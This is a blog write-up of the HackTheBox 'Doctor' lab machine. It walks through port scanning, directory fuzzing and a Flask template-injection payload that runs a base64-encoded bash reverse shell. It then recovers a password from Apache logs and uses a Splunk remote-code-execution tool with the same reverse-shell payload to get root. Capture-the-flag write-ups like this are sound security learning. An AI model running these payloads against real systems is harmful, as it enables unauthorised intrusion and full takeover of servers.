This page looks best with JavaScript enabled

HackTheBox: Doctor

 ·  ☕ 4 min read

Foothold

[jusepe@nix:~/Documents/HackTheBox/Doctor]$ sudo scan doctor.htb
[*] OS based on TTL
Unknown OS
[*] TCP Scan
Open ports: 22,80,8089
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Doctor
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[*] Execution time:
         TTL: 1
         Furious: 133
         Nmap: 38
         Total: 171

The main website looks like this:

Landing page

From there we can get a VHOST from the emails domain, then used ffuf to search for directories:

[jusepe@nix:~/Documents/HackTheBox/Doctor]$ ffuf -c -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://doctors.htb/FUZZ -t 150

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.2.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://doctors.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

# on atleast 2 different hosts [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
# Copyright 2007 James Fisher [Status: 302, Size: 237, Words: 22, Lines: 4]
# This work is licensed under the Creative Commons [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 302, Size: 237, Words: 22, Lines: 4]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 302, Size: 237, Words: 22, Lines: 4]
# or send a letter to Creative Commons, 171 Second Street, [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
#                       [Status: 302, Size: 237, Words: 22, Lines: 4]
# Priority ordered case sensative list, where entries were found [Status: 302, Size: 237, Words: 22, Lines: 4]
# Suite 300, San Francisco, California, 94105, USA. [Status: 302, Size: 237, Words: 22, Lines: 4]
# directory-list-2.3-medium.txt [Status: 302, Size: 237, Words: 22, Lines: 4]
                        [Status: 302, Size: 237, Words: 22, Lines: 4]
home                    [Status: 302, Size: 245, Words: 22, Lines: 4]
login                   [Status: 200, Size: 4204, Words: 1054, Lines: 95]
register                [Status: 200, Size: 4493, Words: 1171, Lines: 101]
archive                 [Status: 200, Size: 101, Words: 7, Lines: 6]
account                 [Status: 302, Size: 251, Words: 22, Lines: 4]
logout                  [Status: 302, Size: 217, Words: 22, Lines: 4]
                        [Status: 302, Size: 237, Words: 22, Lines: 4]
reset_password          [Status: 200, Size: 3493, Words: 752, Lines: 77]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
:: Progress: [220560/220560] :: Job [1/1] :: 150 req/sec :: Duration: [0:15:06] :: Errors: 0 ::

Additionally checked with Wappalyzer and seems to be running Flask on the backend:

Wappalyzer

Then created an account and tested to do STTI with a new post:

STTI Test

It didn’t seem to work on the main webpage, however in /archive it ended up working:

Archive STTI

Then just switched the payload for a reverse shell ({{config.__class__.__init__.__globals__['os'].popen('echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODA4MCAwPiYxCg==" | base64 -d | bash').read()}})

User

Then checked if the user I got shell as is in any additional group:

(remote) web@doctor:/home/web$ id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

We are in adm group so we can read most logs, so check for sensitive data inside them.

(remote) web@doctor:/var/log/apache2$ ls
access.log    access.log.10.gz  access.log.12.gz  access.log.3.gz  access.log.5.gz  access.log.7.gz  access.log.9.gz  error.log    error.log.10.gz  error.log.12.gz  error.log.14.gz  error.log.3.gz  error.log.5.gz  error.log.7.gz  error.log.9.gz
access.log.1  access.log.11.gz  access.log.2.gz   access.log.4.gz  access.log.6.gz  access.log.8.gz  backup           error.log.1  error.log.11.gz  error.log.13.gz  error.log.2.gz   error.log.4.gz  error.log.6.gz  error.log.8.gz  other_vhosts_access.log

Finally found a password which was the password for shaun:

(remote) web@doctor:/var/log/apache2$ cat backup | grep pass
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

Root

Since I managed to login successfully with shaun’s credentials in splunk used PySplunkWhisperer2 to execute commands on it:

[jusepe@nix:~/Documents/HackTheBox/Doctor/SplunkWhisperer2/PySplunkWhisperer2]$ python3 PySplunkWhisperer2_remote.py --host doctor.htb --port 8089 --username shaun --password "Guitar123" --payload "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xOTMvODA4MCAwPiYxCg== | base64 -d | bash" --lhost 10.10.15.193
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpbo837yso.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.15.193:8181/
10.10.10.209 - - [20/Jan/2021 14:56:34] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

Listened for the reverse shell and just got root:

[jusepe@nix:~/Documents/HackTheBox/Doctor]$ pwncat -l -p 8080
[14:56:35] received connection from 10.10.10.209:37646                                                                            connect.py:255
[14:56:36] new host w/ hash 6ad4902a8d02bf576f6539e93bb74a2e                                                                       victim.py:321
[14:56:39] pwncat running in /usr/bin/bash                                                                                         victim.py:354
[14:56:41] pwncat is ready 🐈                                                                                                      victim.py:771

(remote) root@doctor:/$ id
uid=0(root) gid=0(root) groups=0(root)
Share on

ITasahobby
WRITTEN BY
ITasahobby
InTernet lover